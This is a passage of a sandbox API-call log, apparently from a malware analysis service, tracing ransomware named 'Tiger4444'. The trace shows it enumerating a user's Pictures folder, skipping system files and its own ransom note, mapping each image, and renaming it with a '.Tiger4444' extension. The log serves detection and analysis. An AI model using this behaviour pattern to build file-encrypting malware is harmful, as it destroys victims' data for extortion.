lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\JHLKfbZ_wnxI.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\jhlkfbz_wnxi.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.623] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=92768 | out: Addend=0xc6f980) returned 17558880 [0045.623] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4506 [0045.623] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252bd200, ftCreationTime.dwHighDateTime=0x1d4c898, ftLastAccessTime.dwLowDateTime=0x9b659550, ftLastAccessTime.dwHighDateTime=0x1d4c8a2, ftLastWriteTime.dwLowDateTime=0x9b659550, ftLastWriteTime.dwHighDateTime=0x1d4c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x69a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jTcjMuk8-c84cV.bmp", cAlternateFileName="JTCJMU~1.BMP")) returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="Tiger4444.exe") returned -1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2=".") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="..") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="windows") returned -1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="bootmgr") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="pagefile.sys") returned -1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="boot") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="ids.txt") returned 1 [0045.623] lstrcmpiW (lpString1="jTcjMuk8-c84cV.bmp", lpString2="NTUSER.DAT") returned -1 [0045.623] lstrcpyW (in: lpString1=0x30aeada, lpString2="jTcjMuk8-c84cV.bmp" | out: lpString1="jTcjMuk8-c84cV.bmp") returned="jTcjMuk8-c84cV.bmp" [0045.623] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jTcjMuk8-c84cV.bmp", dwFileAttributes=0x0) returned 1 [0045.624] lstrlenW (lpString="jTcjMuk8-c84cV.bmp") returned 18 [0045.624] lstrlenW (lpString="Tiger4444") returned 9 [0045.624] lstrcmpiW (lpString1="c84cV.bmp", lpString2="Tiger4444") returned -1 [0045.624] lstrlenW (lpString=".dll") returned 4 [0045.624] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.624] lstrlenW (lpString=".lnk") returned 4 [0045.624] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.624] lstrlenW (lpString=".ini") returned 4 [0045.624] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.624] lstrlenW (lpString=".sys") returned 4 [0045.624] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.624] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\jTcjMuk8-c84cV.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\jtcjmuk8-c84cv.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.624] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.624] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13707703753) returned 1 [0045.624] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=27044) returned 1 [0045.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0045.624] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0045.624] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6cb0, lpName=0x0) returned 0x2c8 [0045.624] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6cb0) returned 0xbe0000 [0045.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.625] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.625] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13707842318) returned 1 [0045.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0045.625] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0045.625] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.626] CloseHandle (hObject=0x2c8) returned 1 [0045.626] CloseHandle (hObject=0x260) returned 1 [0045.627] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\jTcjMuk8-c84cV.bmp.Tiger4444") returned 53 [0045.627] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\jTcjMuk8-c84cV.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\jtcjmuk8-c84cv.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\jTcjMuk8-c84cV.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\jtcjmuk8-c84cv.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.628] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=27056 | out: Addend=0xc6f980) returned 17651648 [0045.628] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4508 [0045.628] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf84133b0, ftCreationTime.dwHighDateTime=0x1d4ca64, ftLastAccessTime.dwLowDateTime=0x4d83dc90, ftLastAccessTime.dwHighDateTime=0x1d4d052, ftLastWriteTime.dwLowDateTime=0x4d83dc90, ftLastWriteTime.dwHighDateTime=0x1d4d052, nFileSizeHigh=0x0, nFileSizeLow=0xc90b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LkpzuM_D0mU.jpg", cAlternateFileName="LKPZUM~1.JPG")) returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="Tiger4444.exe") returned -1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2=".") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="..") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="windows") returned -1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="bootmgr") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="pagefile.sys") returned -1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="boot") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="ids.txt") returned 1 [0045.628] lstrcmpiW (lpString1="LkpzuM_D0mU.jpg", lpString2="NTUSER.DAT") returned -1 [0045.628] lstrcpyW (in: lpString1=0x30aeada, lpString2="LkpzuM_D0mU.jpg" | out: lpString1="LkpzuM_D0mU.jpg") returned="LkpzuM_D0mU.jpg" [0045.628] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LkpzuM_D0mU.jpg", dwFileAttributes=0x0) returned 1 [0045.628] lstrlenW (lpString="LkpzuM_D0mU.jpg") returned 15 [0045.628] lstrlenW (lpString="Tiger4444") returned 9 [0045.629] lstrcmpiW (lpString1="_D0mU.jpg", lpString2="Tiger4444") returned -1 [0045.629] lstrlenW (lpString=".dll") returned 4 [0045.629] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.629] lstrlenW (lpString=".lnk") returned 4 [0045.629] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.629] lstrlenW (lpString=".ini") returned 4 [0045.629] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.629] lstrlenW (lpString=".sys") returned 4 [0045.629] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.629] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LkpzuM_D0mU.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lkpzum_d0mu.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.629] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.629] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13708287895) returned 1 [0045.630] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=51467) returned 1 [0045.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0045.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0045.630] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcc10, lpName=0x0) returned 0x2c8 [0045.630] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcc10) returned 0xbe0000 [0045.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.632] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13708497067) returned 1 [0045.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0045.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0045.632] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.632] CloseHandle (hObject=0x2c8) returned 1 [0045.633] CloseHandle (hObject=0x260) returned 1 [0045.634] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\LkpzuM_D0mU.jpg.Tiger4444") returned 50 [0045.634] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\LkpzuM_D0mU.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lkpzum_d0mu.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\LkpzuM_D0mU.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\lkpzum_d0mu.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.635] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=51472 | out: Addend=0xc6f980) returned 17678704 [0045.635] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4509 [0045.635] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7443bf90, ftCreationTime.dwHighDateTime=0x1d4d51a, ftLastAccessTime.dwLowDateTime=0xf8826570, ftLastAccessTime.dwHighDateTime=0x1d4ce14, ftLastWriteTime.dwLowDateTime=0xf8826570, ftLastWriteTime.dwHighDateTime=0x1d4ce14, nFileSizeHigh=0x0, nFileSizeLow=0x1289d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M6y8KiMnNaGEd1.bmp", cAlternateFileName="M6Y8KI~1.BMP")) returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="Tiger4444.exe") returned -1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2=".") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="..") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="windows") returned -1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="bootmgr") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="pagefile.sys") returned -1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="boot") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="ids.txt") returned 1 [0045.635] lstrcmpiW (lpString1="M6y8KiMnNaGEd1.bmp", lpString2="NTUSER.DAT") returned -1 [0045.635] lstrcpyW (in: lpString1=0x30aeada, lpString2="M6y8KiMnNaGEd1.bmp" | out: lpString1="M6y8KiMnNaGEd1.bmp") returned="M6y8KiMnNaGEd1.bmp" [0045.635] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\M6y8KiMnNaGEd1.bmp", dwFileAttributes=0x0) returned 1 [0045.635] lstrlenW (lpString="M6y8KiMnNaGEd1.bmp") returned 18 [0045.635] lstrlenW (lpString="Tiger4444") returned 9 [0045.635] lstrcmpiW (lpString1="aGEd1.bmp", lpString2="Tiger4444") returned -1 [0045.635] lstrlenW (lpString=".dll") returned 4 [0045.635] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.635] lstrlenW (lpString=".lnk") returned 4 [0045.636] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.636] lstrlenW (lpString=".ini") returned 4 [0045.636] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.636] lstrlenW (lpString=".sys") returned 4 [0045.636] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.636] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\M6y8KiMnNaGEd1.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\m6y8kimnnaged1.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.636] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.636] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13708908956) returned 1 [0045.636] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=75933) returned 1 [0045.636] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0045.636] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0045.636] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12ba0, lpName=0x0) returned 0x2c8 [0045.636] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12ba0) returned 0xbe0000 [0045.638] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.638] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.638] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.638] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.638] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.638] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.638] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.638] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.638] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13709120264) returned 1 [0045.638] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0045.638] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0045.638] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.639] CloseHandle (hObject=0x2c8) returned 1 [0045.639] CloseHandle (hObject=0x260) returned 1 [0045.641] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\M6y8KiMnNaGEd1.bmp.Tiger4444") returned 53 [0045.641] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\M6y8KiMnNaGEd1.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\m6y8kimnnaged1.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\M6y8KiMnNaGEd1.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\m6y8kimnnaged1.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.642] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=75936 | out: Addend=0xc6f980) returned 17730176 [0045.642] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4511 [0045.642] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd69ab390, ftCreationTime.dwHighDateTime=0x1d4d201, ftLastAccessTime.dwLowDateTime=0xc2b47e90, ftLastAccessTime.dwHighDateTime=0x1d4cbcd, ftLastWriteTime.dwLowDateTime=0xc2b47e90, ftLastWriteTime.dwHighDateTime=0x1d4cbcd, nFileSizeHigh=0x0, nFileSizeLow=0xbfdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N0NZDmMYf0H.bmp", cAlternateFileName="N0NZDM~1.BMP")) returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="Tiger4444.exe") returned -1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2=".") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="..") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="windows") returned -1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="bootmgr") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="pagefile.sys") returned -1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="boot") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="ids.txt") returned 1 [0045.642] lstrcmpiW (lpString1="N0NZDmMYf0H.bmp", lpString2="NTUSER.DAT") returned -1 [0045.642] lstrcpyW (in: lpString1=0x30aeada, lpString2="N0NZDmMYf0H.bmp" | out: lpString1="N0NZDmMYf0H.bmp") returned="N0NZDmMYf0H.bmp" [0045.642] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\N0NZDmMYf0H.bmp", dwFileAttributes=0x0) returned 1 [0045.642] lstrlenW (lpString="N0NZDmMYf0H.bmp") returned 15 [0045.642] lstrlenW (lpString="Tiger4444") returned 9 [0045.643] lstrcmpiW (lpString1="MYf0H.bmp", lpString2="Tiger4444") returned -1 [0045.643] lstrlenW (lpString=".dll") returned 4 [0045.643] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0045.643] lstrlenW (lpString=".lnk") returned 4 [0045.643] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0045.643] lstrlenW (lpString=".ini") returned 4 [0045.643] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0045.643] lstrlenW (lpString=".sys") returned 4 [0045.643] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0045.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\N0NZDmMYf0H.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\n0nzdmmyf0h.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.643] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.643] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13709605925) returned 1 [0045.643] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=49116) returned 1 [0045.643] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0045.643] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0045.643] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc2e0, lpName=0x0) returned 0x2c8 [0045.643] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc2e0) returned 0xbe0000 [0045.645] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.645] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.645] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.645] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.645] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13709816287) returned 1 [0045.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0045.645] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0045.645] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.646] CloseHandle (hObject=0x2c8) returned 1 [0045.646] CloseHandle (hObject=0x260) returned 1 [0045.647] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\N0NZDmMYf0H.bmp.Tiger4444") returned 50 [0045.647] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\N0NZDmMYf0H.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\n0nzdmmyf0h.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\N0NZDmMYf0H.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\n0nzdmmyf0h.bmp.tiger4444"), dwFlags=0x1) returned 1 [0045.648] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=49120 | out: Addend=0xc6f980) returned 17806112 [0045.648] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4513 [0045.648] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d82850, ftCreationTime.dwHighDateTime=0x1d4d56f, ftLastAccessTime.dwLowDateTime=0x43037fe0, ftLastAccessTime.dwHighDateTime=0x1d4d09e, ftLastWriteTime.dwLowDateTime=0x43037fe0, ftLastWriteTime.dwHighDateTime=0x1d4d09e, nFileSizeHigh=0x0, nFileSizeLow=0x11512, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nqh87aP.png", cAlternateFileName="")) returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="Tiger4444.exe") returned -1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2=".") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="..") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="windows") returned -1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="bootmgr") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="pagefile.sys") returned -1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="boot") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="ids.txt") returned 1 [0045.648] lstrcmpiW (lpString1="nqh87aP.png", lpString2="NTUSER.DAT") returned -1 [0045.648] lstrcpyW (in: lpString1=0x30aeada, lpString2="nqh87aP.png" | out: lpString1="nqh87aP.png") returned="nqh87aP.png" [0045.648] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\nqh87aP.png", dwFileAttributes=0x0) returned 1 [0045.648] lstrlenW (lpString="nqh87aP.png") returned 11 [0045.648] lstrlenW (lpString="Tiger4444") returned 9 [0045.648] lstrcmpiW (lpString1="h87aP.png", lpString2="Tiger4444") returned -1 